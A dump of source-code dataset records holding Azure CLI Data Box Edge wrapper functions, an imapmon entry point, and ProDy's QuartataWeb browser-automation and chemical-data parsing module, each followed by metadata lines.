            setattr(getattr(instance, section), attr, value)
    return instance
def databoxedge_order_delete(client,
                             device_name,
                             resource_group_name,
                             no_wait=False):
    """Start deletion of the device's order."""
    return sdk_no_wait(no_wait,
                       client.begin_delete,
                       device_name=device_name,
                       resource_group_name=resource_group_name)
def databoxedge_list_sku(client,
                         filter_=None):
    """List available SKUs, optionally restricted by an OData filter.

    ``filter_`` avoids shadowing the builtin; the SDK expects ``filter``.
    """
    odata_filter = filter_
    return client.list(filter=odata_filter)
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=unused-argument
from azure.cli.core.util import sdk_no_wait
from azure.mgmt.databoxedge.models import Sku
def databoxedge_device_list(client,
resource_group_name=None,
expand=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name,
expand=expand)
return client.list_by_subscription(expand=expand)
def databoxedge_device_show(client,
device_name,
resource_group_name):
return client.get(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_create(client,
device_name,
resource_group_name,
location,
tags=None,
sku=None,
etag=None,
data_box_edge_device_status=None,
description=None,
model_description=None,
friendly_name=None,
no_wait=False):
data_box_edge_device = {}
data_box_edge_device['location'] = location
if tags is not None:
data_box_edge_device['tags'] = tags
if sku is not None:
data_box_edge_device['sku'] = Sku(name=sku)
if etag is not None:
data_box_edge_device['etag'] = etag
if data_box_edge_device is not None:
data_box_edge_device['data_box_edge_device_status'] = data_box_edge_device_status
if description is not None:
data_box_edge_device['description'] = description
if model_description is not None:
data_box_edge_device['model_description'] = model_description
if friendly_name is not None:
data_box_edge_device['friendly_name'] = friendly_name
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
resource_group_name=resource_group_name,
data_box_edge_device=data_box_edge_device)
def databoxedge_device_update(client,
device_name,
resource_group_name,
tags=None):
parameters = {}
if tags is not None:
parameters['tags'] = tags
return client.update(device_name=device_name,
resource_group_name=resource_group_name,
parameters=parameters)
def databoxedge_device_delete(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_download_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_download_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_install_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_install_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_scan_for_update(client,
device_name,
resource_group_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_scan_for_updates,
device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_device_show_update_summary(client,
device_name,
resource_group_name):
return client.get_update_summary(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_alert_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_alert_show(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_list(client,
device_name,
resource_group_name):
return client.list_by_data_box_edge_device(device_name=device_name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_show(client,
device_name,
name,
resource_group_name):
return client.get(device_name=device_name,
name=name,
resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_create(client,
device_name,
name,
resource_group_name,
start,
stop,
rate_in_mbps,
days,
no_wait=False):
parameters = {}
parameters['start'] = start
parameters['stop'] = stop
parameters['rate_in_mbps'] = rate_in_mbps
parameters['days'] = days
return sdk_no_wait(no_wait,
client.begin_create_or_update,
device_name=device_name,
name=name,
resource_group_name=resource_group_name,
parameters=parameters)
def databoxedge_bandwidth_schedule_update(instance,
                                          device_name,
                                          name,
                                          resource_group_name,
                                          start,
                                          stop,
                                          rate_in_mbps,
                                          days,
                                          no_wait=False):
    """Patch a bandwidth-schedule object in place.

    Only non-None arguments overwrite the corresponding attribute; the
    modified instance is returned for the generic-update machinery.
    """
    candidates = (
        ('start', start),
        ('stop', stop),
        ('rate_in_mbps', rate_in_mbps),
        ('days', days),
    )
    for attr, value in candidates:
        if value is not None:
            setattr(instance, attr, value)
    return instance
def databoxedge_bandwidth_schedule_delete(client,
                                          device_name,
                                          name,
                                          resource_group_name,
                                          no_wait=False):
    """Delete a bandwidth schedule from a Data Box Edge device.

    Returns an LRO poller (or the raw operation when no_wait is True).
    """
    target = {
        'device_name': device_name,
        'name': name,
        'resource_group_name': resource_group_name,
    }
    return sdk_no_wait(no_wait, client.begin_delete, **target)
def databoxedge_show_job(client,
                         device_name,
                         name,
                         resource_group_name):
    """Get the status of a job running on a Data Box Edge device."""
    lookup = {
        'device_name': device_name,
        'name': name,
        'resource_group_name': resource_group_name,
    }
    return client.get(**lookup)
def databoxedge_list_node(client,
                          device_name,
                          resource_group_name):
    """List the nodes of a Data Box Edge device."""
    lookup = {
        'device_name': device_name,
        'resource_group_name': resource_group_name,
    }
    return client.list_by_data_box_edge_device(**lookup)
def databoxedge_order_list(client,
                           device_name,
                           resource_group_name):
    """List the orders associated with a Data Box Edge device."""
    lookup = {
        'device_name': device_name,
        'resource_group_name': resource_group_name,
    }
    return client.list_by_data_box_edge_device(**lookup)
def databoxedge_order_show(client,
                           device_name,
                           resource_group_name):
    """Get the (single) order of a Data Box Edge device."""
    lookup = {
        'device_name': device_name,
        'resource_group_name': resource_group_name,
    }
    return client.get(**lookup)
def databoxedge_order_create(client,
                             device_name,
                             resource_group_name,
                             address_line1,
                             postal_code,
                             city,
                             state,
                             country,
                             contact_person,
                             company_name,
                             phone,
                             email_list,
                             status,
                             comments=None,
                             address_line2=None,
                             address_line3=None,
                             no_wait=False):
    """Create (or overwrite) the order for a Data Box Edge device.

    Builds the nested order payload (current status, shipping address,
    contact information) and submits it. Optional address lines and
    comments are only included when provided.
    Returns an LRO poller (or the raw operation when no_wait is True).
    """
    current_status = {'status': status}
    if comments is not None:
        current_status['comments'] = comments

    shipping_address = {'address_line1': address_line1}
    if address_line2 is not None:
        shipping_address['address_line2'] = address_line2
    if address_line3 is not None:
        shipping_address['address_line3'] = address_line3
    shipping_address['postal_code'] = postal_code
    shipping_address['city'] = city
    shipping_address['state'] = state
    shipping_address['country'] = country

    contact_information = {
        'contact_person': contact_person,
        'company_name': company_name,
        'phone': phone,
        'email_list': email_list,
    }

    order = {
        'current_status': current_status,
        'shipping_address': shipping_address,
        'contact_information': contact_information,
    }
    return sdk_no_wait(no_wait,
                       client.begin_create_or_update,
                       device_name=device_name,
                       resource_group_name=resource_group_name,
                       order=order)
def databoxedge_order_update(instance,
                             device_name,
                             resource_group_name,
                             status=None,
                             comments=None,
                             address_line1=None,
                             address_line2=None,
                             address_line3=None,
                             postal_code=None,
                             city=None,
                             state=None,
                             country=None,
                             contact_person=None,
                             company_name=None,
                             phone=None,
                             email_list=None,
                             no_wait=False):
    """Patch an order object in place.

    Only non-None arguments overwrite the corresponding nested attribute
    (current_status, shipping_address or contact_information); the
    modified instance is returned for the generic-update machinery.
    """
    # (sub-object name, attribute name, new value) — sub-objects are only
    # touched when the corresponding value was supplied.
    candidates = (
        ('current_status', 'status', status),
        ('current_status', 'comments', comments),
        ('shipping_address', 'address_line1', address_line1),
        ('shipping_address', 'address_line2', address_line2),
        ('shipping_address', 'address_line3', address_line3),
        ('shipping_address', 'postal_code', postal_code),
        ('shipping_address', 'city', city),
        ('shipping_address', 'state', state),
        ('shipping_address', 'country', country),
        ('contact_information', 'contact_person', contact_person),
        ('contact_information', 'company_name', company_name),
        ('contact_information', 'phone', phone),
        ('contact_information', 'email_list', email_list),
    )
    for section, attr, value in candidates:
        if value is not None:
            setattr(getattr(instance, section), attr, value)
    return instance
def databoxedge_order_delete(client,
                             device_name,
                             resource_group_name,
                             no_wait=False):
    """Delete the order of a Data Box Edge device.

    Returns an LRO poller (or the raw operation when no_wait is True).
    """
    target = {
        'device_name': device_name,
        'resource_group_name': resource_group_name,
    }
    return sdk_no_wait(no_wait, client.begin_delete, **target)
def databoxedge_list_sku(client,
                         filter_=None):
    """List available Data Box Edge SKUs, optionally OData-filtered.

    The trailing underscore avoids shadowing the builtin ``filter``; the
    service parameter is still named ``filter``.
    """
    return client.list(filter=filter_)
|
en
| 0.553276
|
# -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- # pylint: disable=too-many-lines # pylint: disable=unused-argument
| 1.905617
| 2
|
imapmon/__main__.py
|
soar/imapmon
| 0
|
6628083
|
from .scripts import run
def main():
    """Console entry point for imapmon.

    Delegates to the CLI command imported from ``.scripts``; presumably a
    click command — ``auto_envvar_prefix`` would enable IMAPMON_* environment
    variables as option defaults (TODO confirm against ``scripts``).
    """
    return run(auto_envvar_prefix='IMAPMON')  # pylint: disable=no-value-for-parameter
if __name__ == '__main__':
    main()
|
from .scripts import run
def main():
    """Console entry point for imapmon.

    Delegates to the CLI command imported from ``.scripts``; presumably a
    click command — ``auto_envvar_prefix`` would enable IMAPMON_* environment
    variables as option defaults (TODO confirm against ``scripts``).
    """
    return run(auto_envvar_prefix='IMAPMON')  # pylint: disable=no-value-for-parameter
if __name__ == '__main__':
    main()
|
en
| 0.278494
|
# pylint: disable=no-value-for-parameter
| 1.254132
| 1
|
prody/database/quartataweb.py
|
bwingert/ProDy
| 0
|
6628084
|
# -*- coding: utf-8 -*-
"""This module defines classes and functions for browsing QuartataWeb.
----------------------------------------------------------------------------------------
Based on code written by the CHARMM-GUI team (http://charmm-gui.org) and modified by <NAME>
This suite uses the following softwares:
a) python Splinter package (https://splinter.readthedocs.org/en/latest/)
b) a web browser, such as Google Chrome or Mozilla Firefox
c) the corresponding driver such as chromedriver (https://sites.google.com/a/chromium.org/chromedriver/downloads)
for Chrome or geckodriver (https://github.com/mozilla/geckodriver/releases) for Firefox
----------------------------------------------------------------------------------------
"""
from prody import PY3K, LOGGER
import numpy as np
__all__ = ['QuartataWebBrowser', 'QuartataChemicalRecord', 'searchQuartataWeb']
class QuartataWebBrowser(object):
    """Class to browse the QuartataWeb website.

    Drives http://quartata.csb.pitt.edu through a splinter-controlled web
    browser: each ``set*`` method stores a piece of the query configuration
    and re-renders the home page, and the ``view``/``goTo``/``parse``
    methods navigate to result pages and scrape them.
    """

    def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
                 data=None, num_predictions=None, browser_type=None, job_id=None):
        """Instantiate a QuartataWebBrowser object instance.

        :arg data_source: source database for QuartataWeb analysis
            options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
        :type data_source: str

        :arg drug_group: group of drugs if using DrugBank
            options are ``"Approved"`` or ``"All"``. Default is ``"All"``
        :type drug_group: str

        :arg input_type: number corresponding to the input type, options are
            ``1`` (Chemical and/or target) or
            ``2`` (A list of chemicals, targets or chemical combinations).
            Default is ``1``
        :type input_type: int

        :arg query_type: number corresponding to the query type. Options are
            dependent on input_type.
            With input_type 1, they are:
            * ``1`` (chemical-target interaction)
            * ``2`` (chemical-chemical similarity)
            * ``3`` (target-target similarity)
            With input_type 2, they are:
            * ``1`` (chemicals)
            * ``2`` (targets)
            * ``3`` (chemical combinations)
            Default is ``1``
        :type query_type: int

        :arg data: data to enter into the box or boxes. This varies depending on input type
            and query type, but will always be a list of strings.
            For input_type 1, a list with two items is expected. These will be one of the
            following depending on query_type:
            * With query_type 1, the first would be a chemical and the second a target.
              One of these can also be left blank.
            * With query_type 2, the first would be a chemical and the second a chemical.
            * With query_type 3, the first would be a target and the second a target.
            For input_type 2, a list with any length is expected. These will be one of the
            following depending on query_type:
            * With query_type 1, these would be chemicals.
            * With query_type 2, these would be targets.
            * With query_type 3, these would be pairs of chemicals, separated by semicolons.
        :type data: list

        :arg num_predictions: number of predictions to show or consider in addition to
            known interactions. Default is ``0``.
            With DrugBank and input_type 1, a second number can be provided in a list
            for secondary interactions.
        :type num_predictions: int, list

        :arg browser_type: browser type for navigation
            Default is ``"Chrome"``
        :type browser_type: str

        :arg job_id: job ID for accessing previous jobs
            Default is ``None``
        :type job_id: int
        """
        # All configuration starts as None and is populated through the
        # setters below; each setter re-renders the home page.
        self.browser_type = None
        self.browser = None
        self.data_source = None
        self.drug_group = None
        self.input_type = None
        self.query_type = None
        self.data = None
        self.num_predictions = None
        self.job_id = job_id

        # Browser must be set up first — every other setter calls
        # updateHomePage(), which needs self.browser.
        self.setBrowserType(browser_type)
        self.setDataSource(data_source)
        self.setDrugGroup(drug_group)
        self.setInputType(input_type)
        self.setQueryType(query_type)
        self.setData(data)
        self.setNumPredictions(num_predictions)

    def updateHomePage(self):
        """Update the home page with data from setting variables"""
        # The form page differs by data source (index vs index_stitch) and
        # input type (suffix _2 for list input).
        url = "http://quartata.csb.pitt.edu"
        if self.data_source == 'DrugBank':
            url += '/index'
        else:
            url += '/index_stitch'
        if self.input_type == 2:
            url += '_2'
        url += '.php'
        self.browser.visit(url)

        if self.data_source == 'DrugBank':
            # Radio buttons: [0] approved drugs only, [1] all drugs.
            if self.drug_group == 'Approved':
                self.browser.find_by_name('db_type')[0].click()
            else:
                self.browser.find_by_name('db_type')[1].click()
        if self.query_type is not None:
            self.browser.find_by_name('pattern')[self.query_type - 1].click()

        if self.data is not None:
            if self.input_type == 1:
                # Two single-entry boxes; which pair depends on query_type.
                if self.query_type == 1:
                    self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
                    self.browser.find_by_name('q_target_1')[
                        0].fill(self.data[1])
                elif self.query_type == 2:
                    self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
                    self.browser.find_by_name('q_drug_2')[0].fill(self.data[1])
                else:
                    self.browser.find_by_name('q_target_1')[0].fill(self.data[0])
                    self.browser.find_by_name('q_target_2')[0].fill(self.data[1])
            else:
                # NOTE(review): the second test is ``if``, not ``elif``, so a
                # query_type of 1 also falls through to the final ``else`` and
                # fills q_drug_pairs — presumably ``elif`` was intended; confirm.
                if self.query_type == 1:
                    self.browser.find_by_name('q_drugs')[0].fill('\n'.join(self.data))
                if self.query_type == 2:
                    self.browser.find_by_name('q_targets')[0].fill('\n'.join(self.data))
                else:
                    self.browser.find_by_name('q_drug_pairs')[0].fill('\n'.join(self.data))

        if self.num_predictions is not None:
            self.browser.find_by_name('pred_n')[0].fill(self.num_predictions[0])
            if self.data_source == 'DrugBank' and self.input_type == 1:
                self.browser.find_by_name('pred_n_2nd')[0].fill(self.num_predictions[1])

    def setDataSource(self, data_source):
        """Set data_source and update home page

        :arg data_source: source database for QuartataWeb analysis
            options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
        :type data_source: str
        """
        if data_source is None:
            data_source = 'DrugBank'
        elif not isinstance(data_source, str):
            raise TypeError('data_source should be a string or None')
        elif data_source.lower() == 'drugbank':
            data_source = 'DrugBank'  # normalise capitalisation
        elif data_source.lower() == 'stitch':
            data_source = 'STITCH'
        else:
            raise ValueError('data_source should be DrugBank, STITCH or None')

        self.data_source = data_source
        self.updateHomePage()

    def setDrugGroup(self, group):
        """Set drug_group and update home page

        :arg group: group of drugs if using DrugBank
            options are ``"Approved"`` or ``"All"``. Default is ``"All"``
        :type group: str
        """
        # Drug groups only exist in the DrugBank interface.
        if self.data_source == 'DrugBank':
            if group is None:
                group = 'All'
            elif not isinstance(group, str):
                raise TypeError('group must be string or None')
            elif group.lower() == 'all':
                group = 'All'
            elif group.lower() == 'approved':
                group = 'Approved'
            else:
                raise ValueError('group should be approved, all or None')

            self.drug_group = group
            self.updateHomePage()
        elif group is not None:
            LOGGER.warn('there are no groups when using STITCH')

    def setInputType(self, input_type):
        """Set input_type and update home page

        :arg input_type: number corresponding to the input type, options are
            ``1`` (Chemical and/or target) or
            ``2`` (A list of chemicals, targets or chemical combinations).
            Default is ``1``
        :type input_type: int
        """
        if input_type is None:
            input_type = 1
        elif not isinstance(input_type, int):
            raise TypeError('input_type should be an integer (1 or 2) or None')
        elif not input_type in [1, 2]:
            raise ValueError('input_type should be 1, 2 or None')

        self.input_type = input_type
        self.updateHomePage()

    def setQueryType(self, query_type):
        """Set query_type and update home page

        :arg query_type: number corresponding to the query type. Options are
            dependent on input_type.
            With input_type 1, they are:
            * ``1`` (chemical-target interaction)
            * ``2`` (chemical-chemical similarity)
            * ``3`` (target-target similarity)
            With input_type 2, they are:
            * ``1`` (chemicals)
            * ``2`` (targets)
            * ``3`` (chemical combinations)
            Default is ``1``
        :type query_type: int
        """
        if query_type is None:
            query_type = 1
        elif not isinstance(query_type, int):
            raise TypeError(
                'query_type should be an integer (1, 2 or 3) or None')
        elif not query_type in [1, 2, 3]:
            raise ValueError('query_type should be 1, 2, 3 or None')

        self.query_type = query_type
        self.updateHomePage()

    def setData(self, data):
        """Set data and update home page

        :arg data: data to enter into the box or boxes. This varies depending on input type
            and query type, but will always be a list of strings.
            For input_type 1, a list with two items is expected. These will be one of the
            following depending on query_type:
            * With query_type 1, the first would be a chemical and the second a target.
              One of these can also be left blank.
            * With query_type 2, the first would be a chemical and the second a chemical.
            * With query_type 3, the first would be a target and the second a target.
            For input_type 2, a list with any length is expected. These will be one of the
            following depending on query_type:
            * With query_type 1, these would be chemicals.
            * With query_type 2, these would be targets.
            * With query_type 3, these would be pairs of chemicals, separated by semicolons.
        :type data: list
        """
        if data is None:
            LOGGER.warn('data is not set')
        elif not isinstance(data, list):
            raise TypeError('data should be a list')
        else:
            for item in data:
                if not isinstance(item, str):
                    raise TypeError('data should be a list of strings')
            if self.input_type == 1:
                if len(data) > 2:
                    raise ValueError(
                        'data can only have two values with input_type 1')
                if len(data) == 1:
                    # Second form box is left blank.
                    data.append('')
            # NOTE(review): input_type is validated to be 1 or 2 in
            # setInputType, so this branch looks unreachable — presumably
            # ``self.query_type == 3`` (chemical pairs) was intended; confirm.
            if self.input_type == 3:
                for item in data:
                    if item.find(';') == -1:
                        raise ValueError(
                            'each item in data must be a pair with ; as delimiter')
            self.data = data
            self.updateHomePage()

    def setNumPredictions(self, num_predictions):
        """Set num_predictions and update home page

        :arg num_predictions: number of predictions to show or consider in addition to
            known interactions. Default is ``0``.
            With DrugBank and input_type 1, a second number can be provided in a list
            for secondary interactions.
        :type num_predictions: int, list
        """
        if num_predictions is None:
            num_predictions = 0
        if not isinstance(num_predictions, (int, list)):
            raise TypeError(
                'num_predictions should be an integer, a list or None')
        if isinstance(num_predictions, int):
            # Normalise to [primary, secondary]; secondary defaults to 0.
            num_predictions = [num_predictions, 0]
        if num_predictions[0] > 100:
            raise ValueError('1st num_predictions must be <= 100')
        if num_predictions[1] > 20:
            raise ValueError('2nd num_predictions must be <= 20')

        self.num_predictions = num_predictions
        self.updateHomePage()

    def setBrowserType(self, browser_type):
        """Set browser_type and update home page

        :arg browser_type: browser type for navigation
            Default is ``"Chrome"``
        :type browser_type: str
        """
        # NOTE(review): ``self.no_data`` is never assigned anywhere in this
        # class, so this attribute access would raise AttributeError on first
        # use — confirm intended guard (perhaps ``self.browser is None``).
        if self.no_data:
            try:
                from splinter import Browser
            except ImportError:
                raise ImportError('Browser module could not be imported. '
                                  'install splinter package to solve the problem.')
            else:
                # NOTE(review): WebDriverException normally lives in
                # selenium.common.exceptions — verify this import path against
                # the selenium version in use.
                from selenium.webdriver.common.service import WebDriverException
                if browser_type is None:
                    # No preference given: try Chrome first, then Firefox.
                    try:
                        browser = Browser('chrome')
                        url = "http://quartata.csb.pitt.edu"
                        browser.visit(url)
                    except WebDriverException:
                        try:
                            browser = Browser('firefox')
                            url = "http://quartata.csb.pitt.edu"
                            browser.visit(url)
                        except WebDriverException:
                            raise ValueError(
                                'No web driver found for Chrome or Firefox. Please specify a browser type or download an appropriate driver.')
                        else:
                            self.browser_type = 'firefox'
                    else:
                        self.browser_type = 'chrome'
                elif not isinstance(browser_type, str):
                    raise TypeError('browser_type should be a string or None')
                else:
                    try:
                        browser = Browser(browser_type)
                        url = "http://quartata.csb.pitt.edu"
                        browser.visit(url)
                    except WebDriverException:
                        raise ValueError(
                            'No web driver found for browser_type. Please specify a different browser type or download an appropriate driver.')
                    else:
                        self.browser_type = browser_type
                self.browser = browser
                self.updateHomePage()

    def setJObID(self, job_id):
        """Set job_id and view results

        :arg job_id: job ID for accessing previous jobs
            Default is ``None``
        :type job_id: int
        """
        self.job_id = job_id
        self.viewResults()

    def viewResults(self):
        """View results by clicking submit or using a job_id"""
        # Fresh query (no job id, or still on the form page): submit the form
        # and remember the job id embedded in the result URL.
        if self.job_id is None or self.browser.url.find('index') != -1:
            self.browser.find_by_name('submit')[0].click()
            self.job_id = self.browser.url.split('_')[-1].split('=')[-1]
        else:
            # Revisit an existing job's result page directly.
            if self.data_source == 'DrugBank':
                url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result.php?job',
                                'id={0}'.format(self.job_id)])
            else:
                url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result',
                                'stitch.php?job', 'id={0}'.format(self.job_id)])
            self.browser.visit(url)

    def goToDownloads(self):
        """Go to downloads page"""
        if self.job_id is None:
            # Submitting results populates self.job_id.
            self.viewResults()
        if self.data_source == 'DrugBank':
            url = '_'.join(['http://quartata.csb.pitt.edu/quartata_download.php?job',
                            'id={0}'.format(self.job_id)])
        else:
            url = '_'.join(['http://quartata.csb.pitt.edu/quartata_download',
                            'stitch.php?job', 'id={0}'.format(self.job_id)])
        self.browser.visit(url)

    def goToWorkDir(self):
        """Go to working directory"""
        if self.job_id is None:
            self.viewResults()
        url = 'http://quartata.csb.pitt.edu/work/{0}'.format(self.job_id)
        self.browser.visit(url)

    def parseChemicals(self):
        """Go to working directory and parse chemicals for query protein.
        Updates self.chemical_data

        Returns True on success, False on any failure. On success also sets
        self.fields, self.num_fields and self.num_rows.
        """
        # NOTE(review): the bare ``except`` below swallows every exception
        # (including KeyboardInterrupt) and hides the cause of failure;
        # on failure self.chemical_data may never be assigned.
        try:
            self.goToWorkDir()
            if self.data_source == 'DrugBank':
                filename = 'known_drugs_for_query_protein.txt'
            else:
                filename = 'known_chemicals_for_query_protein.txt'
            self.browser.find_by_text(filename)[0].click()

            import requests
            html = requests.get(self.browser.url).content
            if PY3K:
                html = html.decode()

            # First line is a tab-separated header; subsequent lines are rows.
            lines = html.split('\n')
            self.fields = lines[0].split('\t')
            self.num_fields = len(self.fields)
            self.num_rows = len(lines[1:])
            if lines[-1].strip() == '':
                # Ignore a trailing empty line.
                self.num_rows -= 1

            # Infer column dtypes from the first data row: pure digits -> int,
            # digits with a '.' -> float, anything else -> object.
            dtypes = []
            for i, item in enumerate(lines[1].split('\t')):
                if item.isnumeric():
                    dtypes.append((self.fields[i], int))
                elif item.find('.') != -1 and item.replace('.','0').isnumeric():
                    dtypes.append((self.fields[i], float))
                else:
                    dtypes.append((self.fields[i], object))

            self.chemical_data = np.empty(self.num_rows, dtype=dtypes)
            for i, line in enumerate(lines[1:self.num_rows+1]):
                items = line.split('\t')
                if len(items) != self.num_fields:
                    raise ValueError('line {0} has the wrong number of fields'.format(i+1))
                for j, item in enumerate(items):
                    self.chemical_data[i][j] = item
        except:
            success = False
        else:
            success = True
        return success

    def quit(self):
        # Close the underlying browser session.
        self.browser.quit()
class QuartataChemicalRecord(object):
    """Class for handling chemical data from QuartataWebBrowser.

    Fetches the known-chemicals table for a query protein via
    QuartataWebBrowser, indexes it by chemical name and supports filtering
    by molecular weight and confidence score.
    """

    def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
                 data=None, num_predictions=None, browser_type=None, job_id=None):
        """Instantiate a QuartataChemicalRecord object instance.
        Inputs are the same as QuartataWebBrowser.
        """
        self._chemData = None    # raw parsed record array (set by fetch)
        self._filterDict = None  # criterion -> filtered-out names (set by filter)
        # Keep construction arguments as defaults for later fetch() calls.
        self.data_source = data_source
        self.drug_group = drug_group
        self.input_type = input_type
        self.query_type = query_type
        self.data = data
        self.num_predictions = num_predictions
        self.browser_type = browser_type
        self.job_id = job_id
        self.isSuccess = self.fetch(data_source, drug_group, input_type, query_type,
                                    data, num_predictions, browser_type, job_id)

    def fetch(self, data_source=None, drug_group=None, input_type=None, query_type=None,
              data=None, num_predictions=None, browser_type=None, job_id=None):
        """Fetch data.

        Arguments left as None fall back to the values given at construction.
        Returns True if parsing the chemicals table succeeded.
        """
        if data_source is None:
            data_source = self.data_source
        if drug_group is None:
            drug_group = self.drug_group
        if input_type is None:
            input_type = self.input_type
        if query_type is None:
            query_type = self.query_type
        if data is None:
            data = self.data
        if num_predictions is None:
            num_predictions = self.num_predictions
        if browser_type is None:
            browser_type = self.browser_type
        if job_id is None:
            job_id = self.job_id

        self.qwb = QuartataWebBrowser(data_source, drug_group, input_type, query_type,
                                      data, num_predictions, browser_type, job_id)
        isSuccess = self.qwb.parseChemicals()
        self.qwb.quit()
        # NOTE(review): if parseChemicals() failed, self.qwb.chemical_data was
        # never assigned and the next line raises AttributeError — confirm
        # whether an early return on failure was intended.
        self._chemData = self.qwb.chemical_data

        # Index rows by chemical name. Columns appear to be:
        # 0 DB id, 1 name, 2 molecular weight, 3 SMILES, 4 confidence score
        # — TODO confirm against the downloaded file's header.
        chem_temp_dict = dict()
        listAll = []
        for temp in self._chemData:
            temp_dict = dict()
            chem_name = temp[1]
            temp_dict['DB_ID'] = temp[0]
            temp_dict['chemical_name'] = chem_name
            temp_dict['mol_weight'] = temp[2]
            temp_dict['SMILES'] = temp[3]
            temp_dict['conf_score'] = temp[4]
            chem_temp_dict[chem_name] = temp_dict
            listAll.append(chem_name)

        self._listAll = tuple(listAll)  # immutable full list of names
        self._list = self._listAll      # current (possibly filtered) list
        self._chemDict = chem_temp_dict
        return isSuccess

    def getChemicalList(self, filtered=True):
        """Returns chemical list (filters may be applied)"""
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
        if filtered:
            return self._list
        return self._listAll

    def getSMILESList(self, filtered=True):
        """Returns SMILES list (filters may be applied)"""
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
        if filtered:
            return [self._chemDict[key]['SMILES'] for key in self._list]
        return self._chemData['SMILES']

    def getParticularSMILES(self, key):
        """Returns SMILES for a particular chemical"""
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
        return self._chemDict[key]['SMILES']

    def getFilterList(self):
        """Returns a list of chemicals for the entries that were filtered out"""
        filterDict = self._filterDict
        if filterDict is None:
            raise ValueError('You cannot obtain the list of filtered out entries before doing any filtering.')

        # Report how many entries each criterion removed.
        temp_str = ', '.join([str(len(filterDict['lower_MW'])), str(len(filterDict['upper_MW'])),
                              str(len(filterDict['conf_score']))])
        LOGGER.info('Filtered out [' + temp_str + '] for [lower weight, upper weight, confidence score]')
        return self._filterList

    def filter(self, lower_weight=None, upper_weight=None, cutoff_score=None):
        """Filters out chemicals from the list and returns the updated list.
        Chemicals that satisfy any of the following criterion will be filtered out.
        (1) Molecular weight < lower_weight (must be a positive number);
        (2) Molecular weight > upper_weight (must be a positive number);
        (3) Confidence score < cutoff_score (must be a positive number);
        Please note that every time this function is run, this overrides any previous runs.
        Therefore, please provide all filters at once.
        """
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
            return None

        # 0 acts as "no bound": weight/score comparisons against 0 never
        # exclude anything (upper bound is additionally guarded by > 0).
        if lower_weight == None:
            lower_weight = 0
        elif not isinstance(lower_weight, (float, int)):
            raise TypeError('lower_weight must be a float or an integer')
        if lower_weight >= 0:
            lower_weight = float(lower_weight)
        else:
            raise ValueError('lower_weight must be a number not less than 0')

        if upper_weight == None:
            upper_weight = 0
        elif not isinstance(upper_weight, (float, int)):
            raise TypeError('upper_weight must be a float or an integer')
        if upper_weight >= 0:
            upper_weight = float(upper_weight)
        else:
            raise ValueError('upper_weight must be a number not less than 0')

        if cutoff_score == None:
            cutoff_score = 0
        elif not isinstance(cutoff_score, (float, int)):
            raise TypeError('cutoff_score must be a float or an integer')
        elif cutoff_score >= 0:
            cutoff_score = float(cutoff_score)
        else:
            raise ValueError('cutoff_score must be a number not less than 0')

        quartataInfo = self._chemDict
        if quartataInfo is None:
            raise ValueError("Quartata Chemical Record does not have any data yet. Please run fetch.")

        listAll = self._listAll
        # NOTE(review): ref_indices_set is never used below — dead code?
        ref_indices_set = set(range(self.qwb.num_rows))
        filterListLowerMW = []
        filterListUpperMW = []
        filterListConf = []
        # Each chemical is attributed to the FIRST criterion that excludes it.
        for chem in listAll:
            temp_dict = quartataInfo[chem]
            if temp_dict['mol_weight'] < lower_weight:
                filterListLowerMW.append(chem)
                continue
            if upper_weight > 0 and temp_dict['mol_weight'] > upper_weight:
                filterListUpperMW.append(chem)
                continue
            if temp_dict['conf_score'] < cutoff_score:
                filterListConf.append(chem)
                continue

        filterList = filterListLowerMW + filterListUpperMW + filterListConf
        filterDict = {'lower_MW': filterListLowerMW, 'upper_MW': filterListUpperMW, 'conf_score': filterListConf}
        self._filterList = filterList
        self._filterDict = filterDict
        # NOTE: set difference does not preserve the original ordering.
        self._list = list(set(self._listAll) - set(filterList))
